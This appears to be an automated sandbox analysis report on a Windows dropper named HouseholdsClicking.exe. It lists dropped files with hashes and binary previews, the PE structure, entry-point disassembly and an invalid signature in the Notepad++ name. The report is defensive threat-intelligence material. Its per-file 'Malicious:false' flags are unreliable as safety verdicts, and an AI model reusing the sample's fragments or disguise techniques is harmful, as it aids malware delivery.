                                                                                                                                          SSDEEP:1536:ZTRPM9AmDGFg/v98FARN//qoino/CTwIqH3ecBfq/JtN:LJFFgtPRN/ziUCTwI03DBfMJj
                                                                                                                                          MD5:C0717EAA23E1B4D8EF42EA9E99B89B69
                                                                                                                                          SHA1:7E6B3B073737732C572642ED689C241D6D8BC077
                                                                                                                                          SHA-256:BDBE1D6E61B0115D697B5AA9E80D25B453E7474E4E09E559A1832D2DCFDC8FD1
                                                                                                                                          SHA-512:1E75297CFB2E648859B35C4562B0D95C55DAF9BA8E4A66AF13565A1BEBB646A67C680A1E1AC84B1F69F852B64B0F9D736802273B83DF7DDEA55DE19C709A7A31
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:};g....5t....A..q,}..~.SR..7u.$..KR...%.@.....rT..).u.!al.fW,...lj.').t......4.d`.pw$.Lg.|`.9.......k...]''.Z3."5y_...d...gc....wc^.nr8H.Jk!R_R.D.m`....~....D.).4..L../.w..\....q>.5..n.L....{.K....o%.iP.U.L....q...!F6.51...z.-..8.{...S.o......*.1@Y....r....xc....f...o..t.D...)..ms....a}.."rO.SEs..RY..R/...C^y.F+..xn.<.U......S]...bX\..=..9.l.*.k{../j.../..g.2.ln~ )C.......S{... N5./Qx.%.cq...e.{m.8~hK0.......:..S.-...u,+(..ULg.q....`......%...o....$..k.J.........h-.....T.....fQ.;.^.........z.Q'.X.,.)\..!..`.G....'.l..iz.._....HR.+.U..Y?.X.NQ...0.lt.E.AQ..k.........h.{.5...@{.%S.Ty.....8(3.-...UT:.?..$.B...s......E..\!.O..).4k.F......4..@t]d..!..B.<.....2...E..f?...$..*.WQ...=..!...b3:..........7....h.Q')3..7|.~.piic..=...y......=...o..q..........G#Y+nW..P....3.F.....r...JwJ.J.W.....u:i.5.l.......g...D.;.....r.......3F.f&..L.5....t.Z"... .,....3.%...)QG.2.......$e.l.c5d3...Q.t........6......{..#.ln.).P.%.<..._q......W....\.
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):69632
                                                                                                                                          Entropy (8bit):7.996970735141732
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:1536:hKHe6Tk8avhcplFAdcv85JGTpua0urdeJ1QwBUwweBg:hKHzk8FplF7c6p10+yWRn
                                                                                                                                          MD5:99FA6F1A532385C89E16FEF6F954914E
                                                                                                                                          SHA1:6769F770470DF82AD78B32EC1535C345F28FE59C
                                                                                                                                          SHA-256:0C52ACA520B6875005651503A4D6F2B37430A227E9D84FDA93252D2AA094705C
                                                                                                                                          SHA-512:11B81B984A43C03AD5EEE5167DA72D5581D159EA7A3FAFE2BD442BB697915F3D598AC52BE0A843755D2AFF22DFBDA580CCAE455BBEA879E64475B61E24675DB2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:....I.z.-[^.bG.........=.0..O..n.H<.,6..T..c.'.h..c..!.@..#..'m0..|..c.q.Z5..iTy.T51..O..5...@.....BKH.).zrq\...($.VQ....;.)>.\ha....wt..XW..Y6.{..9.M=.'tn......0|hVV.;......4a..U....A/....~.g..v...e....-..Q.h@..."..h....q.Lg+>#y..A..T..8....B.m7>7*Ntyg./Q.Q.^.../SB...Y.....XX0.[....[..g....un.Gv!P.M...3...eZ$...j.m..Vj7...]c.L..%m|...b..n..U...Y..[..f..S.....|lA....&...nw~.sx.T....{4....[.6...V.B........H...i|..y.<.y..`.\...c..nQ....n..kI.g4X3f..#4...0..v`L.9.....PG.....<.5.p.U..T.d.....Y.xb.8..H....1../.%.A.f&..h^3.7!wjx..f.Di..bt..Jo......\..D......%..fL$.i.3s"..Z2v.L..9:........7,...j..{.L.N.............;. .Z.3j..........r.f$......a..l..Zg-.....:.x/..A3.....R?...@ e........Ni......3........p....|.iv.........T.f.....{n.......j.....5H6..../...8(.g.....<.tq..a]a.......=.......7...Q.Ce.ex}..u.......V.......KP.A>......n.HZp.SG.Z.z.)[-..........C./3..;...$..j^...%......1.kC....Ra...~#.[.....R.(.*..C...."U.I..4.YD.)*...O.a2.Y..W...
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):66560
                                                                                                                                          Entropy (8bit):6.684735459735519
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:+eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8q0c:+eOyKODOSpQSAU4CE0c
                                                                                                                                          MD5:91CB734D0460BA18254E8FF059D6374F
                                                                                                                                          SHA1:A7A4053A9C934F5023908F1B83A2A20A137D6C16
                                                                                                                                          SHA-256:AEB2BE9B4E40055826B3F960C271F86E647A92C1DB662ED8ADF9654ED37C9E82
                                                                                                                                          SHA-512:3F5C265F4F651780889A82F5EA08D69E1BA0B22C7D2AEC865BFECD456E791744B2D3F21168B6E359B0620ED6DF0845813546F702F71CAE7118AB12C305350113
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:....u.jbZRX..H...tJ..........E..H...................} ......$0f....P.u..u.j..A.P.n.......3....E..H.....[.....m.....O....} ......$0f....P.u..u.j..E..x.......$....x...........j0.u..u.j..p..p..p..........l...jd.Y..R.u...........a..................tD..........E..x.........x.........} .......0f......Q.u..u.j..p.......]..M ..`+J................}.3.VS.].WS.u.ja.u..X........u.............P...WSh.&J..:...V.u.WS.u.jb.u..".....(..t.WSh.&J......V.u.WS.u.je.u........(..t.WSh.&J......V.u.WS.u.jT.u........(....z...WSh.&J......V.u.WS.u.jY.u.......(....j....K...S.u.3....u.....u.P.u............&....u..u.h.&J..l...S.u..u..u.j..u.......$.E..H...xC....>.u..E..u........./............E..H...x.......u..E..u.......................!..2......E..H....|.....} ......$ f....P.u..u.j.Q.D....u..u.h.&J..|.....w..b...t...p......H...tZH...tD...u..E..H.....w........n.....u.f..uu.j.Y.} ......$0f....P.u..u.j...u..u.h.&J.......u..u V..`+J........}..].WS.u.jI.u.................WSh.&J.......u VWS.u.jM.u........(...
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):126976
                                                                                                                                          Entropy (8bit):6.451923499297437
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:4dgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+3P:4gQaE/loUDtf0accB3gBmf
                                                                                                                                          MD5:F76D99915DAD5D1428306D84FD5CEF4A
                                                                                                                                          SHA1:07C609BC4E5206607858EB56A43C138AD172F3FB
                                                                                                                                          SHA-256:528C4E90EF35FCCFA8ACACCCC6A3A65BF753F211FB7ACC277527921606DD63C5
                                                                                                                                          SHA-512:9DA0F739147C67AB46BA8A896AF99A9CBE10B14B8725BDEBAFC6905DCF5252CC3588250D74A755C380F724E76F968909421858E16CE12075BE13709D1069C626
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:$0.D$...........}..E....@.....L$,...\$x.............D$x.....F......N....=..M....#....<..Q.....C..C............9.A...A..UE...A...A.PVE..ZE...A...A...A...A...A.z.A.Z.A.(.A.\.A.|.A...A...A.h.A...A.lWE.~XE..XE..XE.rYE.M.A...........................................................................................I...A.v.A...A..`E..bE.#cE..cE.8.A...A..YE.>.A...A..ZE.-ZE.M.A.............................................|cE...A...A.GcE...A.gcE..cE..cE..cE..cE..cE.........U..VW.}...G..F....u....._^]...H...w..$.P.A..._..^]...j..~....W.........J..H..J..H..J..H._...F.^]....._..^]...j..F.........7.~..._..^]...j..+.........7...._..^]...j............7.Z..._..^]......A..dE...A...A...A...A...A..eE...A...A.UeE..eE..eE..eE.4.A.....U..U...T....R.S.].VW.....4...F.f..Ntx.].f..5...Q..f..G...Q...u.;.t5.F......%S...N.....=S.......IS..S...F........................vS...........iS..3._^[..]....E..@.......P...E........E......E......D...E.......@..E.A.......j...@..E..E.PV.u.........SO...U...........].....
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):30110
                                                                                                                                          Entropy (8bit):7.201013260715943
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:cDv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:cDv7xvTphAiPChgZ2kOE6
                                                                                                                                          MD5:139ECBC61C65EEED2C66A743ABAC82D0
                                                                                                                                          SHA1:00B2C1A41006975E5D68EDEA5FCB3203A9F1333A
                                                                                                                                          SHA-256:6D0498EC0E7B86B819DD86A54CF13515E4EB50569AFF18C9FFC944EEFDA68251
                                                                                                                                          SHA-512:35C59717C001AC5A894ECB635072D8EEA157B8558E385B637C97493E35E3C4D962199D1799756A0D6C0A6310A327280F755564B9383ACADAB83DB7B02624F3C3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.:.: :*:4:?:G:K:Q:U:[:e:o:y:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.; ;$;*;4;>;H;S;[;_;e;i;o;y;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<"<*<.<4<8<><H<R<\<g<o<s<y<}<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=!=+=6=>=B=H=L=R=\=f=p={=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>.>!>+>5>?>J>R>V>\>`>f>p>z>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?-?>?L?X?........]1.1.2?2l4.4O5.5.8.8.9.9.9p<.<.<.<.=-=9=A=I=Q=Y=a=i={=.=.=.=.=.=.=.=.=.=.=.=.=.>.> >2>D>]>v>.>.>G?T?_?j?y?.?.?.?.?.?.?.?.?.?.?......8....0.0.0!0,070I0T0_095G5^5j5s5.5.8.8;9.9.:[:.:.?......4....1g1r2.2.2.2.2.2.2.2.2.2.2.3.5.5!5+5.9#>3>;>....,....2.3M;Q<X<~<.<.<.<.<.<.<.<.<.<V=.?......`....1.3.4.4.4.5.5.5.5.5.5!5%5)5-5155595=5A5E5I5M5Q5U5Y5]5a5e5i5m5q5u5y5}5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6.6.6.6!6%6)6-6165696=6A6E6I6M6Q6U6Y6]6a6e6i6m6q6u6y6}6.6.6.6.6.6.7.7.7Q9.;.;@<{<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=a>e>i>m>q>u>y>}>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.........0.0.0
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):64512
                                                                                                                                          Entropy (8bit):6.348311128852535
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:Cel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+9BGmd9OTGQG:Cel3EYrDWyu0uZo2+9BGmdATGV
                                                                                                                                          MD5:98D45275D84D549CF80B87BD0144D901
                                                                                                                                          SHA1:E321E6915F70857315778FDB7061D98E4B81A4E7
                                                                                                                                          SHA-256:48ED90918079AFCC3CB658F5898D643C864F2EFC7394FC7353D1CA83F19E7761
                                                                                                                                          SHA-512:5BA8EF5B24CBF770B3FC07F8251F5CB7BEAEABBD03879CCAA0E26A2E529446C8D72FC06A4A40DE39516C9DF4D893A3A60C682819521A3884FB62724C04A1E149
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..................h...............(...............(...........P...(............!..P............ ...............Y...............p...............k...............e.............. _..\............v..f............!..X...........8...............8...............x ...............................V..............8#..,.....................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...............................................................S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.8.0.9.0.4.b.0...8.....C.o.m.p.a.n.y.N.a.m.e.....A.u.t.o.I.t. .T.e.a.m...b.%...C.o.m.m.e.n.t.s...h.t.t.p.:././.w.w.w...a.u.t.o.i.t.s.c.r.i.p.t...c.o.m./.a.u.t.o.i.t.3./.....X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....A.u.t.o.I.t. .v.3. .S.c.r.i.p.t. .(.B.e.t.a.)...8.....F.i.l.e.V.e.r.s.i.o.n.....3.,. .3.,. .1.5.,. .5...8.....I.n.t.e.r.n.a.l.N.a.m.e...A.u.t.o.I.t.3...e.x.e...z.+...L.e.g.a.l.C.o.p.y.r.i.g.h.t..... .1.9.9.9.-.2.0.2.1. .J.o.n.a.t.h.a.n. .B.e.n.n.e.t.t. .&. .A.u.t.o.I.t. .T.e.a.m.....@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...A.
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):100352
                                                                                                                                          Entropy (8bit):7.998096501321864
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:3072:jMSCHPzzMZFHsbM78XjkRVobAJ5Qdzyul+sC:MzmFM0skjVjQd5O
                                                                                                                                          MD5:DF8FDF5F14B162328C5A1C1A7D883B5A
                                                                                                                                          SHA1:69B6CFE2FBC4196E7F84A9E615E0AA845D5462E8
                                                                                                                                          SHA-256:0241AE98F5BC3D7BAF64427D3AF04029D8FB52362E95C0DA931B4A0FDDE5D13B
                                                                                                                                          SHA-512:177D290979EB7B5D1AA1F0660C98E0C4EF9A2949C32E327D0DE439E7B5889CD615830F47C350ED12511A9D58B1CE60299EDEEF64EAF36EA54DDF22E22E76E79B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.$).....&.N......d.....C...u.....&..#.z...<}.....:..i.3,K.0s....(.R7aEp.&0.9@K.A.$,.D.5..s....D...0..............4KO...P....OI.......\.l>.......FT@~....t-.\ ........"aF[JQ....>e6^...N..28.....,....D..p..WFjCUir2......a*..@Lc..hy./...t..._...{.<..N._...}....S..(.V........\..x..W....Nc..R.4.>...<.Q....[.b.ne...t.-....nMe...A..D..&.7.).....S.&....4.?..*1...9-..d.c.2.[1.....=.m...........1..%e.Vx.<~....C5.Kn..3Of .K.M....h....f....q&.....@r.d.m.}R..k...r..V.&..A..*...-.;KR...e.D..c.e.)....N.[nq.......w...S...^.C...Q.....+.yB......J..%...>.y?..x~.h..$.SC..~..u&.>a.=.A>..e...;.,.."N.+..."..h....%...Qq.s.NC...X4......ca..^\{...;&I.;b..K...;'...X.'.Hus..my.l".B`/. ...3..~.0K.:e.@.......$...W.;./.d1I2.3...|....*^(,Q.sC.\.3..Nf..V.7JQ.....t......q.:]..g.}..._.Z..o...P..2.@7.'54..0.:....:T.p.jM....Y..@..=Xv.....Q_... .|`N.n...L..i.......J.%.m..Q.,.3Pw..j.(R...4[..;....76$.^?..............._23....r..G..'..0b7M.nlnZq?...;.j6.yz*<.&...}.Q..<;=].r\a
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):144384
                                                                                                                                          Entropy (8bit):6.664092486590779
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:Zmbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnF:gbfSCOMVIPPL/sZ7HS3zcNPF
                                                                                                                                          MD5:E1A20C475EC5F88B2F289C1E03D35848
                                                                                                                                          SHA1:12A23B096421755073A19D8F5FBFA031224852C8
                                                                                                                                          SHA-256:B64877AEADB747E805C85E4818FC3E667FC7107DFCDC5F3E20B819E1D559EFEF
                                                                                                                                          SHA-512:3FDBEF82EBD83DEADFA21D26516D0E4B2ECA75D1904AFCBB0E64D835D0E1A7CE2EEF03DAE1202321DEE7E30CB4DC556C040EC1038F8AE158F122B26826B98CB9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.Y..P.u...Q....... .}....u+......?...k.0.....M..d.(...0.I.P.....Y.....W....I...uG..0.I...V.....Y......?...k.0W.....M..d.(...`.I............................u..E..@......E.u...W.3.E..iI...U.YY........U...?...k.0.U.....M..T.(......?...k.0.E.......M..D.).t..3.k.....Y..u(.E..E..P.u..u...j.Y...3........$..t....3.8~..Y............?...k.0.E......M..D.).........?k.0.....M..E....2D.-$.0D.-.E.Hu..E..t.......?...k.0.....M..L.( .u.......#.;........E..t..u...`.I.....E.......u.u.j.Y..P.u...s...... ...u2..0.I.P.V.........?...k.0.....M..d.(..3..I..Y..............?k.0.....M..T..3._^[..]..U..j..u..u..u..u..u.........]..U..QVW.=.......tN.}..tH.u..N...F..u.+..2....A..E...A..u.+M.;.v..<2=u.V.u.R..........t.....?.u.3._^..]..@....j.hH.L.......e..j..&%..Y.e...u..u..u..u..(.........u..E..................u.j..2%..Y..U..QS.].V..u..L...j.^.0.U......I.#..u.W.}...tA..tA..t.....u........Y..tM..A..E...A..u.+M.A....t4;.v!j"X_^[..]..t......j.^.0.........RVW..........u.3...3.PPPPP.......U..]..........
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):65536
                                                                                                                                          Entropy (8bit):4.042876042833136
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:CKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/o:CKaj6iTcPAsAhxjgarB/o
                                                                                                                                          MD5:E3C619D6E998064E8E0B65361184EE91
                                                                                                                                          SHA1:E5DC3B5D5746E0BF1338E763F559E3478B970283
                                                                                                                                          SHA-256:4AE3270EA08C657550B1FA048E85E786C7E608BD243A2A6E4A6E70428202CA66
                                                                                                                                          SHA-512:32C1300C725C3B0C9494BBBBA2B0FC87FDD25487E7018F7EAC77115301656EC0AEFDEAFABDF875BCC655967CBEB71D6632FD6F88A4AD03FE9B68DC4F5C6B8831
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):707
                                                                                                                                          Entropy (8bit):4.199195082896046
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:VEmtHyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1t:V9tHyGS9PvCA433C+sCNC1t
                                                                                                                                          MD5:FB5E6B5023C95D6B259E8A32C47E4188
                                                                                                                                          SHA1:DD075EF6C1E7161253E79224DAEC20831AFF4CC9
                                                                                                                                          SHA-256:61CA18D2F088E4AA315E0E989E6D0630C394765E655F567ED99EA53AD9E5F851
                                                                                                                                          SHA-512:7CF610141B7C93CCC7A2F5FA9953A14696A42A0135750C42FB02B4F6BF6BA76A6F5E32B8805FB465173C0D0F87501052E5082497B8E6F7FEA299CB6244512E8F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Bookmarks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):133120
                                                                                                                                          Entropy (8bit):5.76830886452573
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:PR8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPu:58QLeAg0Fuz08XvBNbjaAtsPu
                                                                                                                                          MD5:A2AD31B3B39D97E19767812F46D19EAD
                                                                                                                                          SHA1:E1F31BEAAC4E5C4FF16EBF916E7BF6A2CE2AD99A
                                                                                                                                          SHA-256:EE4DEDD77C361EC10B10B7A34F727528C0A8C90750088A2658424B8C1569DD5C
                                                                                                                                          SHA-512:7DB651D15B4612BE65BF8EC54AFF9A6F5C46964150E3AA96C9C656BFAF064B0C8FDD02E6C47C1EE54945B09061FEF395E4C31D027372A76941A91A547B84D5E5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J.$.J.0.J.H.J.T.J.h.J...J...J...J...J...J.,.J.H.J.l.J...J...J...J...J...J...J...J. .J.(.J.4.J.D.J.`.J...J...J...J...J.$.J.@.J.d.J...J...J...J...J...J.N.J. .J.4.J.P.J.d.J...J.__based(....__cdecl.__pascal....__stdcall...__thiscall..__fastcall..__vectorcall....__clrcall...__eabi..__swift_1...__swift_2...__ptr64.__restrict..__unaligned.restrict(... new.... delete.=...>>..<<..!...==..!=..[]..operator....->..*...++..--..-...+...&...->*./...%...<...<=..>...>=..,...()..~...^...|...&&..||..*=..+=..-=../=..%=..>>=.<<=.&=..|=..^=..`vftable'...`vbtable'...`vcall'.`typeof'....`local static guard'....`string'....`vbase destructor'..`vector deleting destructor'....`default constructor closure'...`scalar deleting destructor'....`vector constructor iterator'...`vector destructor iterator'....`vector vbase constructor iterator'.`virtual displacement map'..`eh vector constructor iterator'....`eh vector destructor iterator'.`eh vector vbase const
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.9613420017471315
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:HouseholdsClicking.exe
                                                                                                                                          File size:1'051'945 bytes
                                                                                                                                          MD5:c3c0fbe6393929c60e63885bab2603f6
                                                                                                                                          SHA1:09c0cb9efeaa8808710df3f47b3c56fcd323b8bd
                                                                                                                                          SHA256:2fbecbe7ba6ce56cfe6b6da8e7aaf6127755161a7ef340b7b20c2b061404f022
                                                                                                                                          SHA512:6d288c7fe70a1a5fc95347a86dff1ce7fed819e994e56be482383273f58d41ccafe2dfeb9b98d9d4250d58b02545cdc856a642549e1f5ef74b48110af701a37e
                                                                                                                                          SSDEEP:24576:tOwnvrCKVzzbzfafzs68PmgUFDWrE1X7BH/:jnTrJnEsNUFyM7Bf
                                                                                                                                          TLSH:D02523C2C9714537F28A0F3A75B4C34799BEECA88C75C0CA6720DB5D83219509F64B9B
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                          Icon Hash:04040c5834646c0c
                                                                                                                                          Entrypoint:0x4038af
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:true
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:5
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:5
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:5
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                          Signature Valid:false
                                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                          Error Number:-2146869232
                                                                                                                                          Not Before, Not After
                                                                                                                                          • 13/05/2022 01:00:00 15/05/2025 00:59:59
                                                                                                                                          Subject Chain
                                                                                                                                          • CN="Notepad++", O="Notepad++", L=Saint Cloud, S=Ile-de-France, C=FR
                                                                                                                                          Version:3
                                                                                                                                          Thumbprint MD5:15E2254C8FC88D4A538BA4FB09C0019E
                                                                                                                                          Thumbprint SHA-1:A731D48CD8E2A99BB91F7C096F40CEDF3A468BA6
                                                                                                                                          Thumbprint SHA-256:866B46DC0876C0B9C85AFE6569E49352A021C255C8E7680DF6AC1FDBAD677033
                                                                                                                                          Serial:03AA6492DE9D96A90A4BCA97BEADB44A
                                                                                                                                          Instruction
                                                                                                                                          sub esp, 000002D4h
                                                                                                                                          push ebx
                                                                                                                                          push ebp
                                                                                                                                          push esi
                                                                                                                                          push edi
                                                                                                                                          push 00000020h
                                                                                                                                          xor ebp, ebp
                                                                                                                                          pop esi
                                                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                                                          mov dword ptr [esp+10h], 0040A268h
                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                          call dword ptr [00409030h]
                                                                                                                                          push 00008001h
                                                                                                                                          call dword ptr [004090B4h]
                                                                                                                                          push ebp
                                                                                                                                          call dword ptr [004092C0h]
                                                                                                                                          push 00000008h
                                                                                                                                          mov dword ptr [0047EB98h], eax
                                                                                                                                          call 00007F59D512ED0Bh
                                                                                                                                          push ebp
                                                                                                                                          push 000002B4h
                                                                                                                                          mov dword ptr [0047EAB0h], eax
                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                          push eax
                                                                                                                                          push ebp
                                                                                                                                          push 0040A264h
                                                                                                                                          call dword ptr [00409184h]
                                                                                                                                          push 0040A24Ch
                                                                                                                                          push 00476AA0h
                                                                                                                                          call 00007F59D512E9EDh
                                                                                                                                          call dword ptr [004090B0h]
                                                                                                                                          push eax
                                                                                                                                          mov edi, 004CF0A0h
                                                                                                                                          push edi
                                                                                                                                          call 00007F59D512E9DBh
                                                                                                                                          push ebp
                                                                                                                                          call dword ptr [00409134h]
                                                                                                                                          cmp word ptr [004CF0A0h], 0022h
                                                                                                                                          mov dword ptr [0047EAB8h], eax
                                                                                                                                          mov eax, edi
                                                                                                                                          jne 00007F59D512C2DAh
                                                                                                                                          push 00000022h
                                                                                                                                          pop esi
                                                                                                                                          mov eax, 004CF0A2h
                                                                                                                                          push esi
                                                                                                                                          push eax
                                                                                                                                          call 00007F59D512E6B1h
                                                                                                                                          push eax
                                                                                                                                          call dword ptr [00409260h]
                                                                                                                                          mov esi, eax
                                                                                                                                          mov dword ptr [esp+1Ch], esi
                                                                                                                                          jmp 00007F59D512C363h
                                                                                                                                          push 00000020h
                                                                                                                                          pop ebx
                                                                                                                                          cmp ax, bx
                                                                                                                                          jne 00007F59D512C2DAh
                                                                                                                                          add esi, 02h
                                                                                                                                          cmp word ptr [esi], bx
                                                                                                                                          Programming Language:
                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                                          • [RES] VS2010 SP1 build 40219
                                                                                                                                          • [LNK] VS2010 SP1 build 40219
                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x3dd6.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xfe3d10x2958
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
